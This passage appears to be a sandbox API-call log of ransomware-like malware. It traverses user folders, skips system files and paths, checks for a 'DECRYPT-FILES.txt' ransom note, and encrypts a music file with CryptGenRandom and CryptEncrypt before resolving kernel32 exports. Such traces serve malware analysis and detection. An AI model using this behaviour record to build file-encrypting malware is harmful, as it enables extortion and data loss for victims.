(lpString1="lnk", lpString2="lnk") returned 0 [0085.223] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="autorun.inf") returned 1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="boot.ini") returned 1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="desktop.ini") returned 1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat") returned -1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="iconcache.db") returned -1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="bootsect.bak") returned 1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat.log") returned -1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="thumbs.db") returned -1 [0085.223] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Bootfont.bin") returned 1 [0085.223] lstrlenW (lpString="Downloads.lnk") returned 13 [0085.223] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0085.223] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefec200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.223] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.223] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.223] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.223] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.223] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.223] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.223] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0085.223] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.223] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0085.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\jkbimi8.tmp" [0085.224] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.224] CloseHandle (hObject=0x0) returned 0 [0085.224] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.224] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="autorun.inf") returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="boot.ini") returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="desktop.ini") returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat") returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="iconcache.db") returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="bootsect.bak") returned 1 [0085.224] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat.log") returned 1 [0085.225] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="thumbs.db") returned -1 [0085.225] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Bootfont.bin") returned 1 [0085.225] lstrlenW (lpString="RecentPlaces.lnk") returned 16 [0085.225] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0085.225] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0085.225] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0085.225] CloseHandle (hObject=0x430) returned 1 [0085.225] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0085.225] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0085.225] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0085.225] lstrcatW (in: lpString1="Local Settings", lpString2="\\" | out: lpString1="Local Settings\\") returned="Local Settings\\" [0085.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Program Files") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch=":\\Windows") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Games\\") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\All Users") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="\\Local Settings\\") returned="\\Local Settings\\" [0085.225] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x87dde1b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x87dde1b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0085.225] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0085.225] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0085.225] lstrcatW (in: lpString1="Music", lpString2="\\" | out: lpString1="Music\\") returned="Music\\" [0085.225] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Program Files") returned 0x0 [0085.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch=":\\Windows") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Games\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\All Users") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="AhnLab") returned 0x0 [0085.226] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.226] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.226] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\jkbimi8.tmp") returned 48 [0085.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0085.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.226] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.226] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\DECRYPT-FILES.txt") returned 54 [0085.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0085.226] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0085.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.227] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.227] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.227] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.227] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37b1a840, ftCreationTime.dwHighDateTime=0x1d4c86c, ftLastAccessTime.dwLowDateTime=0xc898ded0, ftLastAccessTime.dwHighDateTime=0x1d4cada, ftLastWriteTime.dwLowDateTime=0xc898ded0, ftLastWriteTime.dwHighDateTime=0x1d4cada, nFileSizeHigh=0x0, nFileSizeLow=0xb590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7NQgKG6cOq2.m4a", cAlternateFileName="7NQGKG~1.M4A")) returned 1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="DECRYPT-FILES.txt") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="autorun.inf") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="boot.ini") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="desktop.ini") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="ntuser.dat") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="iconcache.db") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="bootsect.bak") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="ntuser.dat.log") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="thumbs.db") returned -1 [0085.227] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a", lpString2="Bootfont.bin") returned -1 [0085.227] lstrlenW (lpString="7NQgKG6cOq2.m4a") returned 15 [0085.227] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0085.227] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0085.227] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0085.227] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0085.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0085.227] lstrlenW (lpString="7NQgKG6cOq2.m4a") returned 15 [0085.227] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0085.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="7NQgKG6cOq2.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a" [0085.227] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7nqgkg6coq2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0085.228] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=46480) returned 1 [0085.228] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0085.228] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.228] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.228] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.228] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.228] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0085.229] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.230] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.230] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.231] CloseHandle (hObject=0x414) returned 1 [0085.231] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.231] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0085.232] CloseHandle (hObject=0x0) returned 0 [0085.232] CloseHandle (hObject=0x410) returned 1 [0085.232] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.233] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.233] GetTickCount () returned 0x114dc3c [0085.233] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.233] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.233] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.233] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.234] lstrlenA (lpString="kernel32.dll") returned 12 [0085.234] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.234] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.234] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.234] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.234] lstrlenA (lpString="ADDATOMA") returned 8 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.234] lstrlenA (lpString="ADDATOMW") returned 8 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.234] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.234] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.234] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.234] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.234] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.234] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.235] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.235] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.235] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.235] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.235] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.235] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.235] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.235] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.235] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.235] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.235] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.235] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.236] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.236] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, 